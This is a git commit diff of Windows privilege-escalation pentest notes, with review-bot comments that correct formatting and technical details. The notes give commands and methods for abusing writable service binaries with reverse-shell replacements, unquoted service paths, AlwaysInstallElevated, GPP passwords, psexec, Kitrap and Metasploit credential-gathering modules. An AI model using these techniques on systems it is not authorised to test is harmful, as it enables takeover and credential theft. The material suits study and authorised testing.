Commit 2f68b123 authored by bobloblaw

Updates privilege_escalation_windows.md

Auto commit by GitBook Editor
parent cdaeb188
+29 −34
@@ -194,7 +194,7 @@ If you find a service that has write permissions set to `everyone` you can chang

First we need to find services. That can be done using `wmci` or `sc.exe`. Wmci is not available on all windows machines, and it might not be available to your user. If you don't have access to it, you can use `sc.exe`.

### WMCI
**WMCI**

```
wmic service list brief
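Review bot: the renamed heading still spells the tool `WMCI`, but the command beneath it is `wmic service list brief` and the sentence above says "using `wmci`" and "Wmci is not available"; while this line is being changed, correct all three to `WMIC`/`wmic` so a reader searching the page for the tool actually finds it. Separately, turning `### WMCI` into bold text drops this step from the rendered table of contents; if the goal is less nesting, use `####` rather than bold.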
@@ -212,7 +212,7 @@ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c

Binaries in system32 are excluded since they are mostly correct, since they are installed by windows.

#### sc.exe
**sc.exe**

```cmd
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt
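Review bot: the context line `sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt` appends, so running the step twice (or on a machine where the file already exists) produces duplicate service names that the later `for /f` loop then processes twice; use `>` to overwrite. Converting `#### sc.exe` to bold text also removes it from the rendered table of contents.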
@@ -231,9 +231,9 @@ Now you can process them one by one with the cacls command.
cacls "C:\path\to\file.exe"
```

### Look for Weakness
**Look for Weakness**

What we are interested in is binaries that have been installed by the user. In the output you want to look for `BUILTIN\Users:\(F\)`. Or where your user/usergroup has `(F)` or `(C)` rights.
What we are interested in is binaries that have been installed by the user. In the output you want to look for `BUILTIN\Users:(F)`. Or where your user/usergroup has `(F)` or `(C)` rights.

Example:

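Review bot: dropping the backslash escapes is right (nothing is escaped inside a backtick code span, so `\(F\)` rendered literally), but the pattern `BUILTIN\Users:(F)` still does not match the `cacls` output shown next (`BUILTIN\Administrators:F`, `NT AUTHORITY\SYSTEM:F`): `cacls` prints the right as a bare letter, and the parenthesised `(F)` form is what `icacls` prints. Either show `BUILTIN\Users:F` here or switch the command to `icacls`. "Or where your user/usergroup has `(F)` or `(C)` rights." is a fragment; fold it into the preceding sentence and say what the letters mean (F is full control, C is change).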
@@ -245,7 +245,7 @@ BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
```

That means your user has write access. So you can just rename the .exe file and then add your own malicious binary. And then restart the program and your binary will be executed instead. This can be a simple getsuid program or a reverse shell that you create with msfvenom.
That means your user has write access. So you can just rename the `.exe` file and then add your own malicious binary. And then restart the program and your binary will be executed instead. This can be a simple getsuid program or a reverse shell that you create with msfvenom.

Here is a POC code for getsuid.

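Review bot: "getsuid" is Unix terminology (the setuid bit) with no Windows equivalent, and "Here is a POC code for getsuid." never says what the program does; state what the POC actually does when the service runs it so readers know what to expect, and merge the three "And then ..." fragments in the changed line into one sentence.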
@@ -259,15 +259,15 @@ return 0;
}
```

We then compile it with our cross-compiler like this:
We then compile it with mingw like this:

```
```bash
i686-w64-mingw32-gcc windows-exp.c -lws2_32 -o exp.exe
```

### Restart the Service
**Restart the Service**

Okay, so now that we have a malicious binary in place we need to restart the service so that it gets executed. We can do this by using **wmic** or **net** the following way:
Okay, so now that we have a malicious binary in place we need to restart the service so that it gets executed. We can do this by using `wmic` or `net` the following way:

```
wmic service NAMEOFSERVICE call startservice
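Review bot: the compile line links Winsock (`-lws2_32`) and builds `windows-exp.c`, while the prose calls the program the getsuid POC and separately mentions a reverse shell "that you create with msfvenom"; say which source this command builds and drop `-lws2_32` unless that file uses sockets, otherwise a link failure cannot be told apart from compiling the wrong file. Replacing "cross-compiler" with "mingw" helps, though the toolchain producing the `i686-w64-mingw32-` prefix is `mingw-w64`, and the new `bash` fence tag is inconsistent with the `cmd` and untagged fences used elsewhere in the file.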
@@ -277,9 +277,9 @@ wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name].
```

The binary should be executed in the SYSTEM or Administrator context.
The binary should now be executed in the SYSTEM or Administrator context.

### Migrate the Meterpreter Shell
**Migrate the meterpreter shell**

If your meterpreter session dies right after you get it you need migrate it to a more stable service. A common service to migrate to is winlogon.exe since it is run by system and it is always run. You can find the PID like this:

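Review bot: the context line `net stop [service name] && net start [service name].` ends with a period inside the code block, which becomes part of the second service name when copied; remove it. The `**Restart the Service**` and `**Migrate the meterpreter shell**` lines lose their heading level (and the latter also drops the title case used by every other heading); keep them as headings so they remain in the table of contents.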
@@ -287,13 +287,13 @@ If your meterpreter session dies right after you get it you need migrate it to a
wmic process list brief | find "winlogon"
```

So when you get the shell you can either type **migrate PID** or automate this so that meterpreter automatically migrates.
So when you get the shell you can either type `migrate PID` or automate this so that meterpreter automatically migrates.

[http://chairofforgetfulness.blogspot.cl/2014/01/better-together-scexe-and.html](http://chairofforgetfulness.blogspot.cl/2014/01/better-together-scexe-and.html)

## Unquoted Service Paths

### Find Services With Unquoted Paths
**Find Services With Unquoted Paths**

```
# Using WMIC
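Review bot: the context line "you need migrate it to a more stable service" is missing "to", and the bare blogspot URL should carry link text saying what it documents, since a raw URL on its own line gives the reader no reason to follow it.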
@@ -308,12 +308,12 @@ sc qc service name

If the path contains a space and is not quoted, the service is vulnerable.

### Exploit It
**Exploit It**

If the path to the binary is
If the path to the binary is:

```
c:\program files\something\program.exe
c:\Program Files\something\winamp.exe
```

We can place a binary like this
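Review bot: `sc qc service name` in the hunk header passes `service` and `name` as two arguments; a service name containing spaces has to be quoted (`sc qc "service name"`), and writing the placeholder as `<service name>` would make that clear. "If the path contains a space and is not quoted, the service is vulnerable." overstates it: an unquoted path is only exploitable when a low-privileged user can create files in one of the parent directories, so the check should include the directory ACLs, and the fix is to quote the binary path in the service configuration. Changing the example to `c:\Program Files\something\winamp.exe` is an improvement, since the old text used `program.exe` for both the legitimate binary and the planted one.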
@@ -322,7 +322,7 @@ We can place a binary like this
c:\program.exe
```

When the program is restarted it will execute the binary **program.exe**, which we of course control. We can do this in any directory that has a space in its name. Not only program files.
When the program is restarted it will execute the binary `program.exe`, which we of course control. We can do this in any directory that has a space in its name. Not only `program files`.

This attack is explained here:  
[http://toshellandback.com/2015/11/24/ms-priv-esc/](http://toshellandback.com/2015/11/24/ms-priv-esc/)
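Review bot: on Vista and later a standard user cannot create a file directly in `c:\` (the default DACL on the drive root lets non-administrators create subfolders only), so `c:\program.exe` is the least likely of the candidate paths to be writable; "We can do this in any directory that has a space in its name" should add that the directory must also be writable by the current user, which is exactly what the `cacls` check earlier in the file establishes. The backtick change for `program.exe` and `program files` is fine.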
@@ -338,7 +338,7 @@ Some driver might be vulnerable. I don't know how to check this in an efficient
driverquery
```

### AlwaysInstallElevated
## AlwaysInstallElevated

```
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
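Review bot: the text should state that `AlwaysInstallElevated` only takes effect when the value is `1` under both `HKLM` and `HKCU`; the two `reg query` lines check both keys, but nothing tells the reader that a single hit is not enough. Promoting the heading to `##` also runs against the rest of this commit, which demotes headings, so confirm the level is intended.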
@@ -349,12 +349,12 @@ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevat

## Group Policy Preference

If the machine belongs to a domain and your user has access to **System Volume Information** there might be some sensitive files there.
If the machine belongs to a domain and your user has access to `System Volume Information` there might be some sensitive files there.

First we need to map/mount that drive. In order to do that we need to know the IP-address of the domain controller. We can just look in the envronment-variables
First we need to map/mount that drive. In order to do that we need to know the IP-address of the domain controller. We can just look in the environment-variables

```
# Output environemtn-variables
# Output environment-variables
set

# Look for the following:
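Review bot: `System Volume Information` is the hidden per-volume folder used for restore points and shadow copies, not where Group Policy Preference files live; those sit in the domain controller's `SYSVOL` share, which is why the text goes on to map a drive to the DC and later refers to `DataSources.xml`. Rename the reference so readers map the right share. The `envronment` and `environemtn` typo fixes are correct.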
@@ -395,7 +395,7 @@ DataSources\DataSources.xml: Element-Specific Attributes

### On Windows XP and Older

If you have a GUI with a user that is included in Administrators group you first need to open up a cmd.exe for the administrator. If you open up the cmd that is in Accessories it will be opened up as a normal user. And if you rightclick and do **Run as Administrator** you might need to know the Administrators password. Which you might not know. So instead you open up the cmd from **c:\windows\system32\cmd.exe**. This will give you a cmd with Administratos rights.
If you have a GUI with a user that is included in Administrators group you first need to open up `cmd.exe` for the administrator. If you open up the cmd that is in Accessories it will be opened up as a normal user. And if you rightclick and do `Run as Administrator` you might need to know the Administrators password. Which you might not know. So instead you open up the cmd from `c:\windows\system32\cmd.exe`. This will give you a cmd with Administrators rights.

From here we want to become SYSTEM user. To do this we run:

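Review bot: the claim that `c:\windows\system32\cmd.exe` gives "a cmd with Administrators rights" while the Accessories shortcut does not needs justification or removal: both start the same binary under the logged-on user's token, and Windows XP has no UAC, so a member of Administrators already has administrative rights in either one. "Run as Administrator" is also the Vista-era menu item; XP offers "Run as...", which asks for another account's credentials, and needing a password there means the logged-on user was not in the Administrators group. The `Administratos` typo fix is fine.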
@@ -412,7 +412,7 @@ And then the cmd with SYSTEM privs pops up.

### Vista and Newer

You first need to upload PsExec.exe anad then you run:
You first need to upload PsExec.exe and then you run:

```
psexec -i -s cmd.exe
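Review bot: `psexec -i -s cmd.exe` only works from an account that is already a local administrator (PsExec installs a service to run as SYSTEM), so this section should state that precondition the way the XP section does; also add `-accepteula`, because the first run otherwise blocks on the licence dialog, which never shows in a non-interactive shell. The `anad` typo fix is fine.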
@@ -420,24 +420,21 @@ psexec -i -s cmd.exe

### Kitrap

On some machines the **at 20:20** trick does not work. It never works on Windows 2003 for example. Instead you can use Kitrap. Upload both files and execute vdmaillowed.exe. I think it only works with GUI.
On some machines the `at 20:20` trick does not work. It never works on Windows 2003 for example. Instead you can use Kitrap. Upload both files and execute `vdmaillowed.exe`. I think it only works with GUI.

```
vdmallowed.exe
vdmexploit.dll
```

## Using Metasploit
### Using Metasploit

So if you have a metasploit meterpreter session going you can run **getsystem**.
So if you have a metasploit meterpreter session going you can run `getsystem`.

### Unquoted Service Paths

```
exploit/windows/local/trusted_service_path
```
## Post modules

### Post modules
Some interesting metasploit post-modules

First you need to background the meterpreter shell and then you just run the post modules.  
You can also try some different post modules.
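Review bot: the changed line says execute `vdmaillowed.exe` but the block beneath it lists `vdmallowed.exe`; fix the spelling in the prose. The heading changes also leave the Metasploit section mis-nested: `## Using Metasploit` becomes `###`, the same level as its own subsection `### Unquoted Service Paths`, while `## Post modules` is promoted above both; keep `## Using Metasploit` with `###` children. "Some interesting metasploit post-modules" needs a colon, and "First you need to background..." and "You can also try some different post modules." say the same thing twice.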
@@ -447,8 +444,6 @@ use exploit/windows/local/service_permissions

post/windows/gather/credentials/gpp



run post/windows/gather/credential_collector 

run post/multi/recon/local_exploit_suggester
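Review bot: `post/windows/gather/credentials/gpp` is listed without the `run` prefix that `run post/windows/gather/credential_collector` and `run post/multi/recon/local_exploit_suggester` use, and the trailing space after `credential_collector` plus the two blank lines between entries should go so the block is consistent and copy-paste safe.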